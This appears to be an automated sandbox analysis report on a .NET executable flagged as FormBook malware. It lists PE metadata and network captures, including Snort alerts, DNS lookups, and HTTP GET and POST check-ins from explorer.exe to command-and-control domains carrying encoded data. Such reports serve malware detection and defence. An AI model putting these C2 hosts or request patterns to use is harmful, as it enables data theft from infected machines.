add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1360b4	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x138000	0x4a00	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x13e000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x134114	0x134200	False	0.526873098377	SysEx File -	6.7251919103	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x138000	0x4a00	0x4a00	False	0.418971706081	data	4.58946973562	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x13e000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x138100	0x4228	dBase III DBT, version number 0, next free block index 40
RT_GROUP_ICON	0x13c338	0x14	data
RT_VERSION	0x13c35c	0x396	big endian ispell hash file (?),
RT_MANIFEST	0x13c704	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2017 Robert B. Cialdini
Assembly Version	43.338.0.0
InternalName	ISymbolReader.exe
FileVersion	43.338.0.0
CompanyName	Robert B. Cialdini
LegalTrademarks
Comments
ProductName	Thesis Nana
ProductVersion	43.338.0.0
FileDescription	Thesis Nana
OriginalFilename	ISymbolReader.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
02/23/21-10:18:06.866595	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49761	80	192.168.2.4	166.62.28.109
02/23/21-10:18:06.866595	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49761	80	192.168.2.4	166.62.28.109
02/23/21-10:18:06.866595	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49761	80	192.168.2.4	166.62.28.109

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 10:18:06.653589964 CET	49761	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:06.866344929 CET	80	49761	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:06.866471052 CET	49761	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:06.866595030 CET	49761	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:07.078996897 CET	80	49761	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:07.090429068 CET	80	49761	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:07.090452909 CET	80	49761	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:07.090722084 CET	49761	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:07.090754986 CET	49761	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:07.303468943 CET	80	49761	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:09.152544022 CET	49765	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:09.359956026 CET	80	49765	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:09.360084057 CET	49765	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:09.360300064 CET	49765	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:09.360378981 CET	49765	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:09.361953974 CET	49766	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:09.567852974 CET	80	49765	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:09.577980042 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:09.578126907 CET	49766	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:09.581161976 CET	49766	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:09.587349892 CET	80	49765	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:09.587372065 CET	80	49765	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:09.587430954 CET	49765	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:09.587464094 CET	49765	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:09.799097061 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:09.799221992 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:09.799484968 CET	49766	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:10.015222073 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.015245914 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.015274048 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.015372992 CET	49766	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:10.015424013 CET	49766	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:10.015562057 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.015602112 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.015650034 CET	49766	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:10.015832901 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.015866041 CET	49766	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:10.017416954 CET	49766	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:10.224750996 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.224912882 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.224982023 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.225083113 CET	49766	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:10.225115061 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.225133896 CET	49766	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:10.225184917 CET	49766	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:10.225233078 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.225235939 CET	49766	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:10.225303888 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.225369930 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.225456953 CET	49766	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:10.225513935 CET	49766	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:10.226703882 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.226906061 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.227708101 CET	49766	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:10.434103012 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.434114933 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.434128046 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.434273005 CET	49766	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:10.434371948 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.434608936 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.434724092 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.434770107 CET	49766	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:10.434853077 CET	49766	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:10.434901953 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.434932947 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.435061932 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.435070992 CET	49766	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:10.435179949 CET	49766	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:10.435218096 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.435403109 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.435539007 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.435643911 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.436907053 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.477783918 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.644077063 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.644118071 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.644198895 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.644684076 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.675653934 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.675697088 CET	80	49766	166.62.28.109	192.168.2.4
Feb 23, 2021 10:18:10.675890923 CET	49766	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:10.675923109 CET	49766	80	192.168.2.4	166.62.28.109
Feb 23, 2021 10:18:27.933581114 CET	49767	80	192.168.2.4	204.11.56.48
Feb 23, 2021 10:18:28.096174002 CET	80	49767	204.11.56.48	192.168.2.4
Feb 23, 2021 10:18:28.098197937 CET	49767	80	192.168.2.4	204.11.56.48
Feb 23, 2021 10:18:28.098315001 CET	49767	80	192.168.2.4	204.11.56.48
Feb 23, 2021 10:18:28.260689974 CET	80	49767	204.11.56.48	192.168.2.4
Feb 23, 2021 10:18:28.356734037 CET	80	49767	204.11.56.48	192.168.2.4
Feb 23, 2021 10:18:28.356792927 CET	80	49767	204.11.56.48	192.168.2.4
Feb 23, 2021 10:18:28.356822014 CET	80	49767	204.11.56.48	192.168.2.4
Feb 23, 2021 10:18:28.356847048 CET	80	49767	204.11.56.48	192.168.2.4
Feb 23, 2021 10:18:28.356880903 CET	80	49767	204.11.56.48	192.168.2.4
Feb 23, 2021 10:18:28.356898069 CET	80	49767	204.11.56.48	192.168.2.4
Feb 23, 2021 10:18:28.356899023 CET	49767	80	192.168.2.4	204.11.56.48
Feb 23, 2021 10:18:28.356925964 CET	80	49767	204.11.56.48	192.168.2.4
Feb 23, 2021 10:18:28.356955051 CET	80	49767	204.11.56.48	192.168.2.4
Feb 23, 2021 10:18:28.356959105 CET	49767	80	192.168.2.4	204.11.56.48
Feb 23, 2021 10:18:28.356981993 CET	80	49767	204.11.56.48	192.168.2.4
Feb 23, 2021 10:18:28.356992006 CET	49767	80	192.168.2.4	204.11.56.48
Feb 23, 2021 10:18:28.357012033 CET	80	49767	204.11.56.48	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 10:17:00.145299911 CET	59123	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:17:00.202740908 CET	53	59123	8.8.8.8	192.168.2.4
Feb 23, 2021 10:17:00.448580980 CET	54531	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:17:00.500087976 CET	53	54531	8.8.8.8	192.168.2.4
Feb 23, 2021 10:17:00.770896912 CET	49714	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:17:00.819494963 CET	53	49714	8.8.8.8	192.168.2.4
Feb 23, 2021 10:17:12.258596897 CET	58028	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:17:12.308609009 CET	53	58028	8.8.8.8	192.168.2.4
Feb 23, 2021 10:17:13.337194920 CET	53097	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:17:13.388766050 CET	53	53097	8.8.8.8	192.168.2.4
Feb 23, 2021 10:17:14.908123970 CET	49257	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:17:14.956823111 CET	53	49257	8.8.8.8	192.168.2.4
Feb 23, 2021 10:17:15.758950949 CET	62389	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:17:15.811815023 CET	53	62389	8.8.8.8	192.168.2.4
Feb 23, 2021 10:17:16.722657919 CET	49910	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:17:16.771343946 CET	53	49910	8.8.8.8	192.168.2.4
Feb 23, 2021 10:17:18.156981945 CET	55854	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:17:18.208350897 CET	53	55854	8.8.8.8	192.168.2.4
Feb 23, 2021 10:17:18.948241949 CET	64549	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:17:18.999797106 CET	53	64549	8.8.8.8	192.168.2.4
Feb 23, 2021 10:17:19.933984995 CET	63153	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:17:19.982636929 CET	53	63153	8.8.8.8	192.168.2.4
Feb 23, 2021 10:17:20.881403923 CET	52991	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:17:20.930058002 CET	53	52991	8.8.8.8	192.168.2.4
Feb 23, 2021 10:17:22.593286037 CET	53700	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:17:22.644855976 CET	53	53700	8.8.8.8	192.168.2.4
Feb 23, 2021 10:17:26.167165041 CET	51726	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:17:26.218637943 CET	53	51726	8.8.8.8	192.168.2.4
Feb 23, 2021 10:17:27.142379045 CET	56794	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:17:27.191050053 CET	53	56794	8.8.8.8	192.168.2.4
Feb 23, 2021 10:17:27.934389114 CET	56534	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:17:27.991821051 CET	53	56534	8.8.8.8	192.168.2.4
Feb 23, 2021 10:17:29.027074099 CET	56627	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:17:29.078591108 CET	53	56627	8.8.8.8	192.168.2.4
Feb 23, 2021 10:17:30.040097952 CET	56621	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:17:30.088749886 CET	53	56621	8.8.8.8	192.168.2.4
Feb 23, 2021 10:17:30.381934881 CET	63116	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:17:30.430861950 CET	53	63116	8.8.8.8	192.168.2.4
Feb 23, 2021 10:17:30.992053986 CET	64078	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:17:31.043906927 CET	53	64078	8.8.8.8	192.168.2.4
Feb 23, 2021 10:17:31.930282116 CET	64801	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:17:31.978893995 CET	53	64801	8.8.8.8	192.168.2.4
Feb 23, 2021 10:17:33.219832897 CET	61721	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:17:33.268524885 CET	53	61721	8.8.8.8	192.168.2.4
Feb 23, 2021 10:17:54.780844927 CET	51255	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:17:54.867033005 CET	53	51255	8.8.8.8	192.168.2.4
Feb 23, 2021 10:17:55.386454105 CET	61522	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:17:55.495026112 CET	53	61522	8.8.8.8	192.168.2.4
Feb 23, 2021 10:17:55.671767950 CET	52337	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:17:55.761003017 CET	53	52337	8.8.8.8	192.168.2.4
Feb 23, 2021 10:17:55.978509903 CET	55046	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:17:56.043746948 CET	53	55046	8.8.8.8	192.168.2.4
Feb 23, 2021 10:17:56.289438963 CET	49612	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:17:56.351093054 CET	53	49612	8.8.8.8	192.168.2.4
Feb 23, 2021 10:17:56.805685997 CET	49285	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:17:56.888719082 CET	53	49285	8.8.8.8	192.168.2.4
Feb 23, 2021 10:17:57.517432928 CET	50601	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:17:57.574737072 CET	53	50601	8.8.8.8	192.168.2.4
Feb 23, 2021 10:17:58.144387007 CET	60875	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:17:58.193130970 CET	53	60875	8.8.8.8	192.168.2.4
Feb 23, 2021 10:17:58.835238934 CET	56448	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:17:58.883908987 CET	53	56448	8.8.8.8	192.168.2.4
Feb 23, 2021 10:17:59.654768944 CET	59172	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:17:59.712086916 CET	53	59172	8.8.8.8	192.168.2.4
Feb 23, 2021 10:18:01.249618053 CET	62420	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:18:01.306843996 CET	53	62420	8.8.8.8	192.168.2.4
Feb 23, 2021 10:18:02.800700903 CET	60579	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:18:02.857645988 CET	53	60579	8.8.8.8	192.168.2.4
Feb 23, 2021 10:18:06.586707115 CET	50183	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:18:06.648824930 CET	53	50183	8.8.8.8	192.168.2.4
Feb 23, 2021 10:18:06.864286900 CET	61531	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:18:06.922821999 CET	53	61531	8.8.8.8	192.168.2.4
Feb 23, 2021 10:18:27.740475893 CET	49228	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:18:27.932404041 CET	53	49228	8.8.8.8	192.168.2.4
Feb 23, 2021 10:18:41.500027895 CET	59794	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:18:41.549379110 CET	53	59794	8.8.8.8	192.168.2.4
Feb 23, 2021 10:18:44.133800983 CET	55916	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:18:44.191183090 CET	53	55916	8.8.8.8	192.168.2.4
Feb 23, 2021 10:18:48.014154911 CET	52752	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:18:48.093099117 CET	53	52752	8.8.8.8	192.168.2.4
Feb 23, 2021 10:18:50.112416029 CET	60542	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:18:50.190359116 CET	53	60542	8.8.8.8	192.168.2.4
Feb 23, 2021 10:18:50.196535110 CET	60689	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:18:50.273461103 CET	53	60689	8.8.8.8	192.168.2.4
Feb 23, 2021 10:19:09.144644976 CET	64206	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:19:09.436120987 CET	53	64206	8.8.8.8	192.168.2.4
Feb 23, 2021 10:19:11.455949068 CET	50904	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:19:11.513313055 CET	53	50904	8.8.8.8	192.168.2.4
Feb 23, 2021 10:19:11.519120932 CET	57525	53	192.168.2.4	8.8.8.8
Feb 23, 2021 10:19:11.815125942 CET	53	57525	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 23, 2021 10:18:06.586707115 CET	192.168.2.4	8.8.8.8	0x5b36	Standard query (0)	www.premiumnetworkstore.com	A (IP address)	IN (0x0001)
Feb 23, 2021 10:18:27.740475893 CET	192.168.2.4	8.8.8.8	0x1f9a	Standard query (0)	www.internationalsoccerteams.com	A (IP address)	IN (0x0001)
Feb 23, 2021 10:18:48.014154911 CET	192.168.2.4	8.8.8.8	0x7df5	Standard query (0)	www.stickleyrep.com	A (IP address)	IN (0x0001)
Feb 23, 2021 10:18:50.112416029 CET	192.168.2.4	8.8.8.8	0xedd3	Standard query (0)	www.stickleyrep.com	A (IP address)	IN (0x0001)
Feb 23, 2021 10:18:50.196535110 CET	192.168.2.4	8.8.8.8	0x2884	Standard query (0)	www.stickleyrep.com	A (IP address)	IN (0x0001)
Feb 23, 2021 10:19:09.144644976 CET	192.168.2.4	8.8.8.8	0xb9e0	Standard query (0)	www.kenapa5-and.com	A (IP address)	IN (0x0001)
Feb 23, 2021 10:19:11.455949068 CET	192.168.2.4	8.8.8.8	0xabfe	Standard query (0)	www.kenapa5-and.com	A (IP address)	IN (0x0001)
Feb 23, 2021 10:19:11.519120932 CET	192.168.2.4	8.8.8.8	0x5fc4	Standard query (0)	www.kenapa5-and.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 23, 2021 10:18:06.648824930 CET	8.8.8.8	192.168.2.4	0x5b36	No error (0)	www.premiumnetworkstore.com	premiumnetworkstore.com		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 10:18:06.648824930 CET	8.8.8.8	192.168.2.4	0x5b36	No error (0)	premiumnetworkstore.com		166.62.28.109	A (IP address)	IN (0x0001)
Feb 23, 2021 10:18:27.932404041 CET	8.8.8.8	192.168.2.4	0x1f9a	No error (0)	www.internationalsoccerteams.com		204.11.56.48	A (IP address)	IN (0x0001)
Feb 23, 2021 10:18:48.093099117 CET	8.8.8.8	192.168.2.4	0x7df5	Name error (3)	www.stickleyrep.com	none	none	A (IP address)	IN (0x0001)
Feb 23, 2021 10:18:50.190359116 CET	8.8.8.8	192.168.2.4	0xedd3	Name error (3)	www.stickleyrep.com	none	none	A (IP address)	IN (0x0001)
Feb 23, 2021 10:18:50.273461103 CET	8.8.8.8	192.168.2.4	0x2884	Name error (3)	www.stickleyrep.com	none	none	A (IP address)	IN (0x0001)
Feb 23, 2021 10:19:09.436120987 CET	8.8.8.8	192.168.2.4	0xb9e0	Name error (3)	www.kenapa5-and.com	none	none	A (IP address)	IN (0x0001)
Feb 23, 2021 10:19:11.513313055 CET	8.8.8.8	192.168.2.4	0xabfe	Name error (3)	www.kenapa5-and.com	none	none	A (IP address)	IN (0x0001)
Feb 23, 2021 10:19:11.815125942 CET	8.8.8.8	192.168.2.4	0x5fc4	Name error (3)	www.kenapa5-and.com	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.premiumnetworkstore.com

www.internationalsoccerteams.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49761	166.62.28.109	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 10:18:06.866595030 CET	3338	OUT	GET /xxg/?Jt7=XPIX3NrP&GlW8J=a8BlEgGkOe5HuSVVIZfAbA83PDdExW7ERnrZA1n9agEZzoNw0EhQ9Eby65z8jt1XZsvj HTTP/1.1 Host: www.premiumnetworkstore.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 10:18:07.090429068 CET	3343	IN	HTTP/1.1 302 Found Date: Tue, 23 Feb 2021 09:18:06 GMT Server: Apache Location: https://www.premiumnetworkstore.com/xxg/?Jt7=XPIX3NrP&GlW8J=a8BlEgGkOe5HuSVVIZfAbA83PDdExW7ERnrZA1n9agEZzoNw0EhQ9Eby65z8jt1XZsvj Content-Length: 316 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 72 65 6d 69 75 6d 6e 65 74 77 6f 72 6b 73 74 6f 72 65 2e 63 6f 6d 2f 78 78 67 2f 3f 4a 74 37 3d 58 50 49 58 33 4e 72 50 26 61 6d 70 3b 47 6c 57 38 4a 3d 61 38 42 6c 45 67 47 6b 4f 65 35 48 75 53 56 56 49 5a 66 41 62 41 38 33 50 44 64 45 78 57 37 45 52 6e 72 5a 41 31 6e 39 61 67 45 5a 7a 6f 4e 77 30 45 68 51 39 45 62 79 36 35 7a 38 6a 74 31 58 5a 73 76 6a 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.premiumnetworkstore.com/xxg/?Jt7=XPIX3NrP&GlW8J=a8BlEgGkOe5HuSVVIZfAbA83PDdExW7ERnrZA1n9agEZzoNw0EhQ9Eby65z8jt1XZsvj">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49765	166.62.28.109	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 10:18:09.360300064 CET	5212	OUT	POST /xxg/ HTTP/1.1 Host: www.premiumnetworkstore.com Connection: close Content-Length: 411 Cache-Control: no-cache Origin: http://www.premiumnetworkstore.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.premiumnetworkstore.com/xxg/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 47 6c 57 38 4a 3d 53 65 4e 66 61 48 4b 75 4d 38 52 58 33 7a 51 43 57 38 4b 57 42 56 77 68 45 79 70 36 34 56 62 30 50 68 36 76 52 48 6a 46 63 68 30 61 30 49 67 71 34 58 67 46 79 7a 6e 30 6f 4b 6e 30 68 66 6c 58 53 4f 6d 35 49 51 46 50 6d 79 64 61 45 43 47 6f 53 41 48 62 70 35 31 4b 70 50 4b 31 49 34 4a 44 34 6e 42 59 53 4c 55 39 59 59 34 49 53 49 76 5a 31 38 61 6a 54 68 6e 31 58 76 41 57 56 69 47 4d 39 5a 37 63 42 45 73 50 49 43 53 4b 6c 44 72 51 46 6b 58 66 70 69 65 35 50 63 43 49 52 64 42 48 5a 52 4b 34 52 4d 42 41 32 6f 78 63 72 50 47 72 62 58 30 6f 54 57 61 4d 54 37 67 6b 32 34 4f 66 71 52 55 5f 44 47 42 35 67 56 42 42 65 65 35 48 42 6a 64 39 75 4a 77 72 64 6b 50 74 7a 54 46 31 43 76 71 38 28 55 39 4e 51 61 38 72 32 63 56 37 62 6f 39 44 59 74 4f 67 4c 55 44 61 4f 66 74 6e 57 58 72 4b 4d 49 37 35 6f 32 5a 72 4c 32 71 6c 77 67 69 4a 67 70 7a 61 69 51 42 78 6e 42 50 54 71 55 6d 71 65 4a 4a 4c 57 48 6f 4e 4e 67 6a 78 77 71 63 4e 38 71 55 4d 38 49 33 43 58 74 34 70 64 51 51 7a 5a 6d 64 6d 45 31 51 68 66 78 6a 76 33 30 75 44 30 59 4d 76 5a 64 70 5f 4c 52 7a 66 65 76 5a 55 53 55 4c 7a 55 30 6b 51 71 63 55 43 50 5f 58 6a 77 5f 31 31 53 45 36 6c 67 54 65 71 33 44 55 6c 77 4b 4d 74 78 30 67 7a 6f 75 6c 70 6e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 